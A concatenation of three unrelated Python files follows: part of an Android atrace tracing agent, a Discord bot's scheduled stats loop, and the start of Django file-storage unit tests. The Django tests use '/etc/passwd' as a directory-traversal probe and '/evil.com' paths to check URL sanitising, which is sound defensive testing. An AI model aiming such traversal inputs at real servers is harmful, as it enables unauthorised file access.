device_sdk_version: Sdk version int of device to be queried.
"""
devutils = device_utils.DeviceUtils(config.device_serial_number)
categories_output = devutils.RunShellCommand(
LIST_CATEGORIES_ARGS, check_return=True)
categories = [c.split('-')[0].strip() for c in categories_output]
if device_sdk_version < version_codes.MARSHMALLOW:
# work around platform bug where rs tag would corrupt trace until M(Api23)
categories = [c for c in categories if c != 'rs']
return categories
def try_create_agent(config):
"""Create an Atrace agent.
Args:
config: Command line config.
"""
if config.target != 'android':
return None
if config.from_file is not None:
return None
if not config.atrace_categories:
return None
# Check device SDK version.
device_sdk_version = util.get_device_sdk_version()
if device_sdk_version < version_codes.JELLY_BEAN_MR2:
print ('Device SDK versions < 18 (Jellybean MR2) not supported.\n'
'Your device SDK version is %d.' % device_sdk_version)
return None
return AtraceAgent(device_sdk_version)
def _construct_extra_atrace_args(config, categories):
"""Construct extra arguments (-a, -k, categories) for atrace command.
Args:
config: Tracing config.
"""
extra_args = []
if config.app_name is not None:
extra_args.extend(['-a', config.app_name])
if config.kfuncs is not None:
extra_args.extend(['-k', config.kfuncs])
extra_args.extend(categories)
return extra_args
def _construct_atrace_args(config, categories):
"""Builds the command used to invoke a trace process.
Returns:
A tuple where the first element is an array of command arguments, and
the second element is a boolean which will be true if the command will
stream trace data.
"""
atrace_args = ATRACE_BASE_ARGS[:]
if config.compress_trace_data:
atrace_args.extend(['-z'])
if (config.trace_time is not None) and (config.trace_time > 0):
atrace_args.extend(['-t', str(config.trace_time)])
if (config.trace_buf_size is not None) and (config.trace_buf_size > 0):
atrace_args.extend(['-b', str(config.trace_buf_size)])
elif 'sched' in categories:
# 'sched' is a high-volume tag, double the default buffer size
# to accommodate that
atrace_args.extend(['-b', '4096'])
extra_args = _construct_extra_atrace_args(config, categories)
atrace_args.extend(extra_args)
return atrace_args
class AtraceAgent(tracing_agents.TracingAgent):
def __init__(self, device_sdk_version):
super(AtraceAgent, self).__init__()
self._device_sdk_version = device_sdk_version
self._adb = None
self._trace_data = None
self._tracer_args = None
self._collection_thread = None
self._device_utils = None
self._device_serial_number = None
self._config = None
self._categories = None
def __repr__(self):
return 'atrace'
@py_utils.Timeout(tracing_agents.START_STOP_TIMEOUT)
def StartAgentTracing(self, config, timeout=None):
assert config.atrace_categories, 'Atrace categories are missing!'
self._config = config
self._categories = config.atrace_categories
if isinstance(self._categories, list):
self._categories = ','.join(self._categories)
avail_cats = get_available_categories(config, self._device_sdk_version)
unavailable = [x for x in self._categories.split(',') if
x not in avail_cats]
self._categories = [x for x in self._categories.split(',') if
x in avail_cats]
if unavailable:
print 'These categories are unavailable: ' + ' '.join(unavailable)
self._device_utils = device_utils.DeviceUtils(config.device_serial_number)
self._device_serial_number = config.device_serial_number
self._tracer_args = _construct_atrace_args(config,
self._categories)
self._device_utils.RunShellCommand(
self._tracer_args + ['--async_start'], check_return=True)
return True
def _collect_and_preprocess(self):
"""Collects and preprocesses trace data.
Stores results in self._trace_data.
"""
trace_data = self._collect_trace_data()
self._trace_data = self._preprocess_trace_data(trace_data)
@py_utils.Timeout(tracing_agents.START_STOP_TIMEOUT)
def StopAgentTracing(self, timeout=None):
"""Stops tracing and starts collecting results.
To synchronously retrieve the results after calling this function,
call GetResults().
"""
self._collection_thread = threading.Thread(
target=self._collect_and_preprocess)
self._collection_thread.start()
return True
@py_utils.Timeout(tracing_agents.GET_RESULTS_TIMEOUT)
def GetResults(self, timeout=None):
"""Waits for collection thread to finish and returns trace results."""
self._collection_thread.join()
self._collection_thread = None
return trace_result.TraceResult('systemTraceEvents', self._trace_data)
def SupportsExplicitClockSync(self):
return True
def RecordClockSyncMarker(self, sync_id, did_record_sync_marker_callback):
"""Records a clock sync marker.
Args:
sync_id: ID string for clock sync marker.
"""
cmd = 'echo trace_event_clock_sync: name=%s >' \
' /sys/kernel/debug/tracing/trace_marker' % sync_id
with self._device_utils.adb.PersistentShell(
self._device_serial_number) as shell:
t1 = trace_time_module.Now()
shell.RunCommand(cmd, close=True)
did_record_sync_marker_callback(t1, sync_id)
def _stop_trace(self):
"""Stops atrace.
Note that prior to Api 23, --async-stop may not actually stop tracing.
Thus, this uses a fallback method of running a zero-length synchronous
trace if tracing is still on."""
self._device_utils.RunShellCommand(
self._tracer_args + ['--async_stop'], check_return=True)
is_trace_enabled_file = '/sys/kernel/debug/tracing/tracing_on'
if self._device_sdk_version < version_codes.MARSHMALLOW:
if int(self._device_utils.ReadFile(is_trace_enabled_file)):
# tracing was incorrectly left on, disable it
self._device_utils.RunShellCommand(
self._tracer_args + ['-t 0'], check_return=True)
def _collect_trace_data(self):
"""Reads the output from atrace and stops the trace."""
dump_cmd = self._tracer_args + ['--async_dump']
result = self._device_utils.RunShellCommand(
dump_cmd, raw_output=True, check_return=True)
data_start = re.search(TRACE_START_REGEXP, result)
if data_start:
data_start = data_start.end(0)
else:
raise IOError('Unable to get atrace data. Did you forget adb root?')
output = re.sub(ADB_IGNORE_REGEXP, '', result[data_start:])
self._stop_trace()
return output
def _preprocess_trace_data(self, trace_data):
"""Performs various processing on atrace data.
Args:
trace_data: The raw trace data.
Returns:
The processed trace data.
"""
if trace_data:
trace_data = strip_and_decompress_trace(trace_data)
if not trace_data:
print >> sys.stderr, ('No data was captured. Output file was not '
'written.')
sys.exit(1)
if _FIX_THREAD_IDS:
# Issue ps command to device and patch thread names
# TODO(catapult:#3215): Migrate to device.GetPids()
ps_dump = self._device_utils.RunShellCommand(
'ps -T -o USER,TID,PPID,VSIZE,RSS,WCHAN,ADDR=PC,S,CMD || ps -t',
shell=True, check_return=True)
thread_names = extract_thread_list(ps_dump)
trace_data = fix_thread_names(trace_data, thread_names)
if _FIX_MISSING_TGIDS:
# Issue printf command to device and patch tgids
procfs_dump = self._device_utils.RunShellCommand(
'printf "%s\n" /proc/[0-9]*/task/[0-9]*',
shell=True, check_return=True)
pid2_tgid = extract_tgids(procfs_dump)
trace_data = fix_missing_tgids(trace_data, pid2_tgid)
if _FIX_CIRCULAR_TRACES:
trace_data = fix_circular_traces(trace_data)
return trace_data
def extract_thread_list(trace_lines):
"""Removes the thread list from the given trace data.
Args:
trace_lines: The text portion of the trace
Returns:
a map of thread ids to thread names
"""
threads = {}
# Assume any line that starts with USER is the header
header = -1
for i, line in enumerate(trace_lines):
cols = line.split()
if len(cols) >= 8 and cols[0] == 'USER':
header = i
break
if header == -1:
return threads
for line in trace_lines[header + 1:]:
cols = line.split(None, 8)
if len(cols) == 9:
tid = int(cols[1])
name = cols[8]
threads[tid] = name
return threads
def extract_tgids(trace_lines):
"""Removes the procfs dump from the given trace text
Args:
trace_lines: The text portion of the trace
Returns:
a map of pids to their tgid.
"""
tgid_2pid = {}
for line in trace_lines:
result = re.match('^/proc/([0-9]+)/task/([0-9]+)', line)
if result:
parent_pid, tgid = result.group(1, 2)
tgid_2pid[tgid] = parent_pid
return tgid_2pid
def strip_and_decompress_trace(trace_data):
"""Fixes new-lines and decompresses trace data.
Args:
trace_data: The trace data returned by atrace.
Returns:
The decompressed trace data.
"""
# Collapse CRLFs that are added by adb shell.
if trace_data.startswith('\r\n'):
trace_data = trace_data.replace('\r\n', '\n')
elif trace_data.startswith('\r\r\n'):
# On windows, adb adds an extra '\r' character for each line.
trace_data = trace_data.replace('\r\r\n', '\n')
# Skip the initial newline.
if trace_data[0] == '\n':
trace_data = trace_data[1:]
if not trace_data.startswith(TRACE_TEXT_HEADER):
# No header found, so assume the data is compressed.
trace_data = zlib.decompress(trace_data)
# Enforce Unix line-endings.
trace_data = trace_data.replace('\r', '')
# Skip any initial newlines.
while trace_data and trace_data[0] == '\n':
trace_data = trace_data[1:]
return trace_data
def fix_thread_names(trace_data, thread_names):
"""Replaces thread ids with their names.
Args:
trace_data: The atrace data.
thread_names: A mapping of thread ids to thread names.
Returns:
The updated trace data.
"""
def repl(m):
tid = int(m.group(2))
if tid > 0:
name = thread_names.get(tid)
if name is None:
name = m.group(1)
if name == '<...>':
name = '<' + str(tid) + '>'
thread_names[tid] = name
return name + '-' + m.group(2)
else:
return m.group(0)
# matches something like:
# Binder_2-895, or com.google.android.inputmethod.latin-1078 etc...
trace_data = re.sub(r'^\s*(\S+)-(\d+)', repl, trace_data,
flags=re.MULTILINE)
return trace_data
def fix_missing_tgids(trace_data, pid2_tgid):
"""Replaces missing TGIDs from the trace data with those found in procfs
Args:
trace_data: the atrace data
Returns:
The updated trace data with missing TGIDs replaced with the correct TGID
"""
def repl(m):
tid = m.group(2)
if (int(tid) > 0 and m.group(1) != '<idle>' and m.group(3) == '(-----)'
and tid in pid2_tgid):
# returns Proc_name-PID (TGID)
# Binder_2-381 (-----) becomes Binder_2-381 (128)
return m.group(1) + '-' + m.group(2) + ' ( ' + pid2_tgid[tid] + ')'
return m.group(0)
# matches something like:
# Binder_2-895 (-----)
trace_data = re.sub(r'^\s*(\S+)-(\d+)\s+(\(\S+\))', repl, trace_data,
flags=re.MULTILINE)
return trace_data
def fix_circular_traces(out):
"""Fix inconsistentcies in traces due to circular buffering.
The circular buffers are kept per CPU, so it is not guaranteed that the
beginning of a slice is overwritten before the end. To work around this, we
throw away the prefix of the trace where not all CPUs have events yet.
Args:
out: The data to fix.
Returns:
The updated trace data.
"""
# If any of the CPU's buffers have filled up and
# older events have been dropped, the kernel
# emits markers of the form '##### CPU 2 buffer started ####' on
# the line before the first event in the trace on that CPU.
#
# No such headers are emitted if there were no overflows or the trace
# was captured with non-circular buffers.
buffer_start_re = re.compile(r'^#+ CPU \d+ buffer started', re.MULTILINE)
start_of_full_trace = 0
while True:
result = buffer_start_re.search(out, start_of_full_trace + 1)
if result:
start_of_full_trace = result.start()
else:
break
if start_of_full_trace > 0:
# Need to keep the header intact to make the importer happy.
end_of_header = re.search(r'^[^#]', out, re.MULTILINE).start()
out = out[:end_of_header] + out[start_of_full_trace:]
return out
class AtraceConfig(tracing_agents.TracingConfig):
def __init__(self, atrace_categories, trace_buf_size, kfuncs,
app_name, compress_trace_data, from_file,
device_serial_number, trace_time, target):
tracing_agents.TracingConfig.__init__(self)
self.atrace_categories = atrace_categories
self.trace_buf_size = trace_buf_size
self.kfuncs = kfuncs
self.app_name = app_name
self.compress_trace_data = compress_trace_data
self.from_file = from_file
self.device_serial_number = device_serial_number
self.trace_time = trace_time
self.target = target
def add_options(parser):
options = optparse.OptionGroup(parser, 'Atrace options')
options.add_option('--atrace-categories', dest='atrace_categories',
help='Select atrace categories with a comma-delimited '
'list, e.g. --atrace-categories=cat1,cat2,cat3')
options.add_option('-k', '--ktrace', dest='kfuncs', action='store',
help='specify a comma-separated list of kernel functions '
'to trace')
options.add_option('--no-compress', dest='compress_trace_data',
default=True, action='store_false',
help='Tell the device not to send the trace data in '
'compressed form.')
options.add_option('-a', '--app', dest='app_name', default=None,
type='string', action='store',
help='enable application-level tracing for '
'comma-separated list of app cmdlines')
options.add_option('--from-file', dest='from_file',
action='store', help='read the trace from a '
'file (compressed) rather than running a '
'live trace')
return options
def get_config(options):
return AtraceConfig(options.atrace_categories,
options.trace_buf_size, options.kfuncs,
options.app_name, options.compress_trace_data,
options.from_file, options.device_serial_number,
options.trace_time, options.target)
|
ready_loop.py
|
# Called when the bot is ready to be used
import asyncio
import datetime
import sqlite3
import threading
import time
import discord
from Data.Const_variables.import_const import Login, Ids
from Script.import_emojis import Emojis
from Script.import_functions import int_to_str
async def ready_loop(self):
if self.id == 704688212832026724:
status_channel = self.get_channel(733089353634545684)
msg = await status_channel.send(f"{Emojis['Yes']} Connected")
await msg.edit(content=f"{Emojis['Yes']} Connected `{msg.created_at.replace(microsecond=0).isoformat(sep=' ')}` UTC-0")
clash_info = self
def thread_weekly_stats():
while True:
date = datetime.datetime.now()
monday = datetime.date.today() + datetime.timedelta(days=(7 - date.weekday()))
monday = datetime.datetime(monday.year, monday.month, monday.day)
diff = monday - date
time.sleep(diff.seconds + diff.days * 24 * 3600)
print("Weekly Stats", datetime.datetime.now())
# ===== WEEKLY STATS =====
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
class WeeklyStatsBot(discord.Client):
weekly_bot_connected = asyncio.Event()
def __init__(self):
super().__init__()
async def on_ready(self):
channel = self.get_channel(Ids["Weekly_stats_channel"])
old_servers_count = 0
async for message in channel.history(limit=None):
if message.is_system():
await message.delete()
if message.pinned:
old_servers_count = int(message.content)
await message.delete()
break
msg = await channel.send(str(len(clash_info.guilds)))
await msg.pin()
diff_servers_count = len(clash_info.guilds) - old_servers_count
diff_servers_count = "%+d" % (diff_servers_count)
await channel.send(f"Evolution of number of servers this week : {diff_servers_count}")
await self.logout()
async def on_disconnect(self):
self.weekly_bot_connected.set()
weekly_stats_bot = WeeklyStatsBot()
async def login():
await weekly_stats_bot.login(Login["discord"]["beta"])
loop.run_until_complete(login())
async def wrapped_connect():
try:
await weekly_stats_bot.connect()
except Exception as e:
print("Weekly, ", e)
await weekly_stats_bot.close()
weekly_stats_bot.weekly_bot_connected.set()
loop.create_task(wrapped_connect())
async def check_close():
futures = [weekly_stats_bot.weekly_bot_connected.wait()]
await asyncio.wait(futures)
loop.run_until_complete(check_close())
loop.close()
thread = threading.Thread(target=thread_weekly_stats, args=())
thread.start()
def thread_monthly_users():
while True:
date = datetime.datetime.now()
if date.month < 12:
day1 = datetime.datetime(date.year, date.month + 1, 1)
else:
day1 = datetime.datetime(date.year + 1, 1, 1)
diff = day1 - date
time.sleep(diff.seconds + diff.days * 24 * 3600 + 3600) # 1h00 instead of 0h00 to avoid conflicts with WeeklyStats
print("Monthly Users Stats", datetime.datetime.now())
# ===== MONTHLY USERS =====
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
class MonthlyUsersBot(discord.Client):
monthly_bot_connected = asyncio.Event()
def __init__(self):
super().__init__()
async def on_ready(self):
connection = sqlite3.connect("Data/Modifiable_variables.sqlite")
cursor = connection.cursor()
cursor.execute("SELECT COUNT(*) FROM BotUsage")
nb_monthly_users = cursor.fetchone()[0]
text = f"Monthly users : {nb_monthly_users}"
channel = self.get_channel(Ids["Monthly_stats_channel"])
await channel.send(text)
if len(str(date.month)) == 1:
month = "0" + str(date.month)
else:
month = str(date.month)
w = f"""CREATE TABLE IF NOT EXISTS BotUsage_{date.year}_{month} AS SELECT * FROM BotUsage"""
cursor.execute(w)
cursor.execute("DELETE FROM BotUsage")
connection.commit()
await self.logout()
async def on_disconnect(self):
self.monthly_bot_connected.set()
monthly_users_bot = MonthlyUsersBot()
async def login():
await monthly_users_bot.login(Login["discord"]["beta"])
loop.run_until_complete(login())
async def wrapped_connect():
try:
await monthly_users_bot.connect()
except Exception as e:
print("Monthly, ", e)
await monthly_users_bot.close()
monthly_users_bot.monthly_bot_connected.set()
loop.create_task(wrapped_connect())
async def check_close():
futures = [monthly_users_bot.monthly_bot_connected.wait()]
await asyncio.wait(futures)
loop.run_until_complete(check_close())
loop.close()
thread = threading.Thread(target=thread_monthly_users, args=())
thread.start()
print("Connected")
while True:
nb_guilds = len(self.guilds)
act = discord.Activity(type=discord.ActivityType.watching, name=int_to_str(nb_guilds) + " servers")
await self.change_presence(status=discord.Status.online, activity=act)
await asyncio.sleep(60)
|
tests.py
|
import os
import shutil
import sys
import tempfile
import threading
import time
import unittest
from datetime import datetime, timedelta
from io import StringIO
from pathlib import Path
from urllib.request import urlopen
from django.core.cache import cache
from django.core.exceptions import SuspiciousFileOperation
from django.core.files.base import ContentFile, File
from django.core.files.storage import (
FileSystemStorage,
Storage as BaseStorage,
default_storage,
get_storage_class,
)
from django.core.files.uploadedfile import (
InMemoryUploadedFile,
SimpleUploadedFile,
TemporaryUploadedFile,
)
from django.db.models import FileField
from django.db.models.fields.files import FileDescriptor
from django.test import (
LiveServerTestCase,
SimpleTestCase,
TestCase,
override_settings,
)
from django.test.utils import requires_tz_support
from django.urls import NoReverseMatch, reverse_lazy
from django.utils import timezone
from django.utils._os import symlinks_supported
from .models import (
Storage,
callable_storage,
temp_storage,
temp_storage_location,
)
FILE_SUFFIX_REGEX = "[A-Za-z0-9]{7}"
class GetStorageClassTests(SimpleTestCase):
def test_get_filesystem_storage(self):
"""
get_storage_class returns the class for a storage backend name/path.
"""
self.assertEqual(
get_storage_class("django.core.files.storage.FileSystemStorage"),
FileSystemStorage,
)
def test_get_invalid_storage_module(self):
"""
get_storage_class raises an error if the requested import don't exist.
"""
with self.assertRaisesMessage(ImportError, "No module named 'storage'"):
get_storage_class("storage.NonexistentStorage")
def test_get_nonexistent_storage_class(self):
"""
get_storage_class raises an error if the requested class don't exist.
"""
with self.assertRaises(ImportError):
get_storage_class("django.core.files.storage.NonexistentStorage")
def test_get_nonexistent_storage_module(self):
"""
get_storage_class raises an error if the requested module don't exist.
"""
with self.assertRaisesMessage(
ImportError, "No module named 'django.core.files.nonexistent_storage'"
):
get_storage_class(
"django.core.files.nonexistent_storage.NonexistentStorage"
)
class FileSystemStorageTests(unittest.TestCase):
def test_deconstruction(self):
path, args, kwargs = temp_storage.deconstruct()
self.assertEqual(path, "django.core.files.storage.FileSystemStorage")
self.assertEqual(args, ())
self.assertEqual(kwargs, {"location": temp_storage_location})
kwargs_orig = {
"location": temp_storage_location,
"base_url": "http://myfiles.example.com/",
}
storage = FileSystemStorage(**kwargs_orig)
path, args, kwargs = storage.deconstruct()
self.assertEqual(kwargs, kwargs_orig)
def test_lazy_base_url_init(self):
"""
FileSystemStorage.__init__() shouldn't evaluate base_url.
"""
storage = FileSystemStorage(base_url=reverse_lazy("app:url"))
with self.assertRaises(NoReverseMatch):
storage.url(storage.base_url)
class FileStorageTests(SimpleTestCase):
storage_class = FileSystemStorage
def setUp(self):
self.temp_dir = tempfile.mkdtemp()
self.storage = self.storage_class(
location=self.temp_dir, base_url="/test_media_url/"
)
# Set up a second temporary directory which is ensured to have a mixed
# case name.
self.temp_dir2 = tempfile.mkdtemp(suffix="aBc")
def tearDown(self):
shutil.rmtree(self.temp_dir)
shutil.rmtree(self.temp_dir2)
def test_empty_location(self):
"""
Makes sure an exception is raised if the location is empty
"""
storage = self.storage_class(location="")
self.assertEqual(storage.base_location, "")
self.assertEqual(storage.location, os.getcwd())
def test_file_access_options(self):
"""
Standard file access options are available, and work as expected.
"""
self.assertFalse(self.storage.exists("storage_test"))
f = self.storage.open("storage_test", "w")
f.write("storage contents")
f.close()
self.assertTrue(self.storage.exists("storage_test"))
f = self.storage.open("storage_test", "r")
self.assertEqual(f.read(), "storage contents")
f.close()
self.storage.delete("storage_test")
self.assertFalse(self.storage.exists("storage_test"))
def _test_file_time_getter(self, getter):
# Check for correct behavior under both USE_TZ=True and USE_TZ=False.
# The tests are similar since they both set up a situation where the
# system time zone, Django's TIME_ZONE, and UTC are distinct.
self._test_file_time_getter_tz_handling_on(getter)
self._test_file_time_getter_tz_handling_off(getter)
@override_settings(USE_TZ=True, TIME_ZONE="Africa/Algiers")
def _test_file_time_getter_tz_handling_on(self, getter):
# Django's TZ (and hence the system TZ) is set to Africa/Algiers which
# is UTC+1 and has no DST change. We can set the Django TZ to something
# else so that UTC, Django's TIME_ZONE, and the system timezone are all
# different.
now_in_algiers = timezone.make_aware(datetime.now())
with timezone.override(timezone.get_fixed_timezone(-300)):
# At this point the system TZ is +1 and the Django TZ
# is -5. The following will be aware in UTC.
now = timezone.now()
self.assertFalse(self.storage.exists("test.file.tz.on"))
f = ContentFile("custom contents")
f_name = self.storage.save("test.file.tz.on", f)
self.addCleanup(self.storage.delete, f_name)
dt = getter(f_name)
# dt should be aware, in UTC
self.assertTrue(timezone.is_aware(dt))
self.assertEqual(now.tzname(), dt.tzname())
# The three timezones are indeed distinct.
naive_now = datetime.now()
algiers_offset = now_in_algiers.tzinfo.utcoffset(naive_now)
django_offset = timezone.get_current_timezone().utcoffset(naive_now)
utc_offset = timezone.utc.utcoffset(naive_now)
self.assertGreater(algiers_offset, utc_offset)
self.assertLess(django_offset, utc_offset)
# dt and now should be the same effective time.
self.assertLess(abs(dt - now), timedelta(seconds=2))
@override_settings(USE_TZ=False, TIME_ZONE="Africa/Algiers")
def _test_file_time_getter_tz_handling_off(self, getter):
# Django's TZ (and hence the system TZ) is set to Africa/Algiers which
# is UTC+1 and has no DST change. We can set the Django TZ to something
# else so that UTC, Django's TIME_ZONE, and the system timezone are all
# different.
now_in_algiers = timezone.make_aware(datetime.now())
with timezone.override(timezone.get_fixed_timezone(-300)):
# At this point the system TZ is +1 and the Django TZ
# is -5.
self.assertFalse(self.storage.exists("test.file.tz.off"))
f = ContentFile("custom contents")
f_name = self.storage.save("test.file.tz.off", f)
self.addCleanup(self.storage.delete, f_name)
dt = getter(f_name)
# dt should be naive, in system (+1) TZ
self.assertTrue(timezone.is_naive(dt))
# The three timezones are indeed distinct.
naive_now = datetime.now()
algiers_offset = now_in_algiers.tzinfo.utcoffset(naive_now)
django_offset = timezone.get_current_timezone().utcoffset(naive_now)
utc_offset = timezone.utc.utcoffset(naive_now)
self.assertGreater(algiers_offset, utc_offset)
self.assertLess(django_offset, utc_offset)
# dt and naive_now should be the same effective time.
self.assertLess(abs(dt - naive_now), timedelta(seconds=2))
# If we convert dt to an aware object using the Algiers
# timezone then it should be the same effective time to
# now_in_algiers.
_dt = timezone.make_aware(dt, now_in_algiers.tzinfo)
self.assertLess(abs(_dt - now_in_algiers), timedelta(seconds=2))
def test_file_get_accessed_time(self):
"""
File storage returns a Datetime object for the last accessed time of
a file.
"""
self.assertFalse(self.storage.exists("test.file"))
f = ContentFile("custom contents")
f_name = self.storage.save("test.file", f)
self.addCleanup(self.storage.delete, f_name)
atime = self.storage.get_accessed_time(f_name)
self.assertEqual(
atime, datetime.fromtimestamp(os.path.getatime(self.storage.path(f_name)))
)
self.assertLess(
timezone.now() - self.storage.get_accessed_time(f_name),
timedelta(seconds=2),
)
@requires_tz_support
def test_file_get_accessed_time_timezone(self):
self._test_file_time_getter(self.storage.get_accessed_time)
def test_file_get_created_time(self):
"""
File storage returns a datetime for the creation time of a file.
"""
self.assertFalse(self.storage.exists("test.file"))
f = ContentFile("custom contents")
f_name = self.storage.save("test.file", f)
self.addCleanup(self.storage.delete, f_name)
ctime = self.storage.get_created_time(f_name)
self.assertEqual(
ctime, datetime.fromtimestamp(os.path.getctime(self.storage.path(f_name)))
)
self.assertLess(
timezone.now() - self.storage.get_created_time(f_name), timedelta(seconds=2)
)
@requires_tz_support
def test_file_get_created_time_timezone(self):
self._test_file_time_getter(self.storage.get_created_time)
def test_file_get_modified_time(self):
"""
File storage returns a datetime for the last modified time of a file.
"""
self.assertFalse(self.storage.exists("test.file"))
f = ContentFile("custom contents")
f_name = self.storage.save("test.file", f)
self.addCleanup(self.storage.delete, f_name)
mtime = self.storage.get_modified_time(f_name)
self.assertEqual(
mtime, datetime.fromtimestamp(os.path.getmtime(self.storage.path(f_name)))
)
self.assertLess(
timezone.now() - self.storage.get_modified_time(f_name),
timedelta(seconds=2),
)
@requires_tz_support
def test_file_get_modified_time_timezone(self):
self._test_file_time_getter(self.storage.get_modified_time)
def test_file_save_without_name(self):
"""
File storage extracts the filename from the content object if no
name is given explicitly.
"""
self.assertFalse(self.storage.exists("test.file"))
f = ContentFile("custom contents")
f.name = "test.file"
storage_f_name = self.storage.save(None, f)
self.assertEqual(storage_f_name, f.name)
self.assertTrue(os.path.exists(os.path.join(self.temp_dir, f.name)))
self.storage.delete(storage_f_name)
def test_file_save_with_path(self):
"""
Saving a pathname should create intermediate directories as necessary.
"""
self.assertFalse(self.storage.exists("path/to"))
self.storage.save("path/to/test.file", ContentFile("file saved with path"))
self.assertTrue(self.storage.exists("path/to"))
with self.storage.open("path/to/test.file") as f:
self.assertEqual(f.read(), b"file saved with path")
self.assertTrue(
os.path.exists(os.path.join(self.temp_dir, "path", "to", "test.file"))
)
self.storage.delete("path/to/test.file")
@unittest.skipUnless(
symlinks_supported(), "Must be able to symlink to run this test."
)
def test_file_save_broken_symlink(self):
"""A new path is created on save when a broken symlink is supplied."""
nonexistent_file_path = os.path.join(self.temp_dir, "nonexistent.txt")
broken_symlink_path = os.path.join(self.temp_dir, "symlink.txt")
os.symlink(nonexistent_file_path, broken_symlink_path)
f = ContentFile("some content")
f_name = self.storage.save(broken_symlink_path, f)
self.assertIs(os.path.exists(os.path.join(self.temp_dir, f_name)), True)
def test_save_doesnt_close(self):
with TemporaryUploadedFile("test", "text/plain", 1, "utf8") as file:
file.write(b"1")
file.seek(0)
self.assertFalse(file.closed)
self.storage.save("path/to/test.file", file)
self.assertFalse(file.closed)
self.assertFalse(file.file.closed)
file = InMemoryUploadedFile(StringIO("1"), "", "test", "text/plain", 1, "utf8")
with file:
self.assertFalse(file.closed)
self.storage.save("path/to/test.file", file)
self.assertFalse(file.closed)
self.assertFalse(file.file.closed)
def test_file_path(self):
"""
File storage returns the full path of a file
"""
self.assertFalse(self.storage.exists("test.file"))
f = ContentFile("custom contents")
f_name = self.storage.save("test.file", f)
self.assertEqual(self.storage.path(f_name), os.path.join(self.temp_dir, f_name))
self.storage.delete(f_name)
def test_file_url(self):
"""
File storage returns a url to access a given file from the web.
"""
self.assertEqual(
self.storage.url("test.file"), self.storage.base_url + "test.file"
)
# should encode special chars except ~!*()'
# like encodeURIComponent() JavaScript function do
self.assertEqual(
self.storage.url(r"~!*()'@#$%^&*abc`+ =.file"),
"/test_media_url/~!*()'%40%23%24%25%5E%26*abc%60%2B%20%3D.file",
)
self.assertEqual(self.storage.url("ab\0c"), "/test_media_url/ab%00c")
# should translate os path separator(s) to the url path separator
self.assertEqual(
self.storage.url("""a/b\\c.file"""), "/test_media_url/a/b/c.file"
)
# #25905: remove leading slashes from file names to prevent unsafe url output
self.assertEqual(self.storage.url("/evil.com"), "/test_media_url/evil.com")
self.assertEqual(self.storage.url(r"\evil.com"), "/test_media_url/evil.com")
self.assertEqual(self.storage.url("///evil.com"), "/test_media_url/evil.com")
self.assertEqual(self.storage.url(r"\\\evil.com"), "/test_media_url/evil.com")
self.assertEqual(self.storage.url(None), "/test_media_url/")
def test_base_url(self):
"""
File storage returns a url even when its base_url is unset or modified.
"""
self.storage.base_url = None
with self.assertRaises(ValueError):
self.storage.url("test.file")
# #22717: missing ending slash in base_url should be auto-corrected
storage = self.storage_class(
location=self.temp_dir, base_url="/no_ending_slash"
)
self.assertEqual(
storage.url("test.file"), "%s%s" % (storage.base_url, "test.file")
)
def test_listdir(self):
"""
File storage returns a tuple containing directories and files.
"""
self.assertFalse(self.storage.exists("storage_test_1"))
self.assertFalse(self.storage.exists("storage_test_2"))
self.assertFalse(self.storage.exists("storage_dir_1"))
self.storage.save("storage_test_1", ContentFile("custom content"))
self.storage.save("storage_test_2", ContentFile("custom content"))
os.mkdir(os.path.join(self.temp_dir, "storage_dir_1"))
self.addCleanup(self.storage.delete, "storage_test_1")
self.addCleanup(self.storage.delete, "storage_test_2")
for directory in ("", Path("")):
with self.subTest(directory=directory):
dirs, files = self.storage.listdir(directory)
self.assertEqual(set(dirs), {"storage_dir_1"})
self.assertEqual(set(files), {"storage_test_1", "storage_test_2"})
def test_file_storage_prevents_directory_traversal(self):
"""
File storage prevents directory traversal (files can only be accessed if
they're below the storage location).
"""
with self.assertRaises(SuspiciousFileOperation):
self.storage.exists("..")
with self.assertRaises(SuspiciousFileOperation):
self.storage.exists("/etc/passwd")
def test_file_storage_preserves_filename_case(self):
"""The storage backend should preserve case of filenames."""
# Create a storage backend associated with the mixed case name
# directory.
other_temp_storage = self.storage_class(location=self.temp_dir2)
# Ask that storage backend to store a file with a mixed case filename.
mixed_case = "CaSe_SeNsItIvE"
file = other_temp_storage.open(mixed_case, "w")
file.write("storage contents")
file.close()
self.assertEqual(
os.path.join(self.temp_dir2, mixed_case),
other_temp_storage.path(mixed_case),
)
other_temp_storage.delete(mixed_case)
def test_makedirs_race_handling(self):
"""
File storage should be robust against directory creation race conditions.
"""
real_makedirs = os.makedirs
# Monkey-patch os.makedirs, to simulate a normal call, a raced call,
# and an error.
def fake_makedirs(path, mode=0o777, exist_ok=False):
if path == os.path.join(self.temp_dir, "normal"):
real_makedirs(path, mode, exist_ok)
elif path == os.path.join(self.temp_dir, "raced"):
real_makedirs(path, mode, exist_ok)
if not exist_ok:
raise FileExistsError()
elif path == os.path.join(self.temp_dir, "error"):
raise PermissionError()
else:
self.fail("unexpected argument %r" % path)
try:
os.makedirs = fake_makedirs
self.storage.save("normal/test.file", ContentFile("saved normally"))
with self.storage.open("normal/test.file") as f:
self.assertEqual(f.read(), b"saved normally")
self.storage.save("raced/test.file", ContentFile("saved with race"))
with self.storage.open("raced/test.file") as f:
self.assertEqual(f.read(), b"saved with race")
# Exceptions aside from FileExistsError are raised.
with self.assertRaises(PermissionError):
self.storage.save("error/test.file", ContentFile("not saved"))
finally:
os.makedirs = real_makedirs
def test_remove_race_handling(self):
"""
File storage should be robust against file removal race conditions.
"""
real_remove = os.remove
# Monkey-patch os.remove, to simulate a normal call, a raced call,
# and an error.
def fake_remove(path):
if path == os.path.join(self.temp_dir, "normal.file"):
real_remove(path)
elif path == os.path.join(self.temp_dir, "raced.file"):
real_remove(path)
raise FileNotFoundError()
elif path == os.path.join(self.temp_dir, "error.file"):
raise PermissionError()
else:
self.fail("unexpected argument %r" % path)
try:
os.remove = fake_remove
self.storage.save("normal.file", ContentFile("delete normally"))
self.storage.delete("normal.file")
self.assertFalse(self.storage.exists("normal.file"))
self.storage.save("raced.file", ContentFile("delete with race"))
self.storage.delete("raced.file")
self.assertFalse(self.storage.exists("normal.file"))
# Exceptions aside from FileNotFoundError are raised.
self.storage.save("error.file", ContentFile("delete with error"))
with self.assertRaises(PermissionError):
self.storage.delete("error.file")
finally:
os.remove = real_remove
def test_file_chunks_error(self):
"""
Test behavior when file.chunks() is raising an error
"""
f1 = ContentFile("chunks fails")
def failing_chunks():
raise OSError
